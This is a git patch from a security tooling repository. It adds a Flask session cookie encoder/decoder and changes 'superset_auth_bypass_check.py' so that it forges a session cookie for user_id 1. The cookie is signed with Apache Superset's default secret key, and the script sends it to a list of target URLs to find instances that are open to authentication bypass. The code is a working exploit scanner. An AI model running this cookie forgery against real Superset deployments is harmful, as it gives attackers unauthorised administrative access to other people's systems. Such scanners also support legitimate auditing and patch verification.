From 8437465f1be32fe7c643e9103688fc08729a823f Mon Sep 17 00:00:00 2001 From: OKAY_TC <50813688+Okaytc@users.noreply.github.com> Date: Thu, 3 Aug 2023 16:53:19 +0800 Subject: [PATCH] Add files via upload --- flask_session_cookie_manager3.py | 159 +++++++++++++++++++++++++++++++ superset_auth_bypass_check.py | 9 +- 2 files changed, 166 insertions(+), 2 deletions(-) create mode 100644 flask_session_cookie_manager3.py diff --git a/flask_session_cookie_manager3.py b/flask_session_cookie_manager3.py new file mode 100644 index 0000000..c1ca800 --- /dev/null +++ b/flask_session_cookie_manager3.py @@ -0,0 +1,159 @@ +""" Flask Session Cookie Decoder/Encoder """ +__author__ = 'Wilson Sumanang, Alexandre ZANNI' + +# standard imports +import sys +import zlib +from itsdangerous import base64_decode +import ast + +# Abstract Base Classes (PEP 3119) +if sys.version_info[0] < 3: # < 3.0 + raise Exception('Must be using at least Python 3') +elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4 + from abc import ABCMeta, abstractmethod +else: # > 3.4 + from abc import ABC, abstractmethod + +# Lib for argument parsing +import argparse + +# external Imports +from flask.sessions import SecureCookieSessionInterface + +class MockApp(object): + + def __init__(self, secret_key): + self.secret_key = secret_key + + +if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4 + class FSCM(metaclass=ABCMeta): + def encode(secret_key, session_cookie_structure): + """ Encode a Flask session cookie """ + try: + app = MockApp(secret_key) + + session_cookie_structure = dict(ast.literal_eval(session_cookie_structure)) + si = SecureCookieSessionInterface() + s = si.get_signing_serializer(app) + + return s.dumps(session_cookie_structure) + except Exception as e: + return "[Encoding error] {}".format(e) + raise e + + + def decode(session_cookie_value, secret_key=None): + """ Decode a Flask cookie """ + try: + if(secret_key==None): + compressed = False + payload = session_cookie_value + + if payload.startswith('.'): + compressed = True + payload = payload[1:] + + data = payload.split(".")[0] + + data = base64_decode(data) + if compressed: + data = zlib.decompress(data) + + return data + else: + app = MockApp(secret_key) + + si = SecureCookieSessionInterface() + s = si.get_signing_serializer(app) + + return s.loads(session_cookie_value) + except Exception as e: + return "[Decoding error] {}".format(e) + raise e +else: # > 3.4 + class FSCM(ABC): + def encode(secret_key, session_cookie_structure): + """ Encode a Flask session cookie """ + try: + app = MockApp(secret_key) + + session_cookie_structure = dict(ast.literal_eval(session_cookie_structure)) + si = SecureCookieSessionInterface() + s = si.get_signing_serializer(app) + + return s.dumps(session_cookie_structure) + except Exception as e: + return "[Encoding error] {}".format(e) + raise e + + + def decode(session_cookie_value, secret_key=None): + """ Decode a Flask cookie """ + try: + if(secret_key==None): + compressed = False + payload = session_cookie_value + + if payload.startswith('.'): + compressed = True + payload = payload[1:] + + data = payload.split(".")[0] + + data = base64_decode(data) + if compressed: + data = zlib.decompress(data) + + return data + else: + app = MockApp(secret_key) + + si = SecureCookieSessionInterface() + s = si.get_signing_serializer(app) + + return s.loads(session_cookie_value) + except Exception as e: + return "[Decoding error] {}".format(e) + raise e + + +if __name__ == "__main__": + # Args are only relevant for __main__ usage + + ## Description for help + parser = argparse.ArgumentParser( + description='Flask Session Cookie Decoder/Encoder', + epilog="Author : Wilson Sumanang, Alexandre ZANNI") + + ## prepare sub commands + subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand') + + ## create the parser for the encode command + parser_encode = subparsers.add_parser('encode', help='encode') + parser_encode.add_argument('-s', '--secret-key', metavar='', + help='Secret key', required=True) + parser_encode.add_argument('-t', '--cookie-structure', metavar='', + help='Session cookie structure', required=True) + + ## create the parser for the decode command + parser_decode = subparsers.add_parser('decode', help='decode') + parser_decode.add_argument('-s', '--secret-key', metavar='', + help='Secret key', required=False) + parser_decode.add_argument('-c', '--cookie-value', metavar='', + help='Session cookie value', required=True) + + ## get args + args = parser.parse_args() + + ## find the option chosen + if(args.subcommand == 'encode'): + if(args.secret_key is not None and args.cookie_structure is not None): + print(FSCM.encode(args.secret_key, args.cookie_structure)) + elif(args.subcommand == 'decode'): + if(args.secret_key is not None and args.cookie_value is not None): + print(FSCM.decode(args.cookie_value,args.secret_key)) + elif(args.cookie_value is not None): + print(FSCM.decode(args.cookie_value)) + diff --git a/superset_auth_bypass_check.py b/superset_auth_bypass_check.py index 9246e2c..a002f51 100644 --- a/superset_auth_bypass_check.py +++ b/superset_auth_bypass_check.py @@ -5,15 +5,20 @@ import requests import sys import re import threading +import subprocess from requests.exceptions import RequestException from urllib3.exceptions import InsecureRequestWarning +command = ['python3', 'flask_session_cookie_manager3.py', 'encode', '-s', 'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', '-t', "{'user_id': 1}"] +session = subprocess.run(command, capture_output=True, text=True) +sessionout = session.stdout.strip() + # 自定义请求头字段 headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", - "Cookie": "session=eyJ1c2VyX2lkIjoxfQ.ZEnvAw.psuAEJtVOeGlEgnJGqKLKSLE5WE" + "Cookie": "session="+sessionout } vulurl=[] @@ -45,7 +50,7 @@ def urltest(url): #漏洞检测 def vultest(url): try: - response = requests.get(url, headers=headers, verify=False , timeout=3) + response = requests.get(url, headers=headers, verify=False , timeout=3, allow_redirects=False) parsed_url = urlsplit(url) url=parsed_url.scheme+"://"+parsed_url.netloc # 检查响应头的状态码是否为200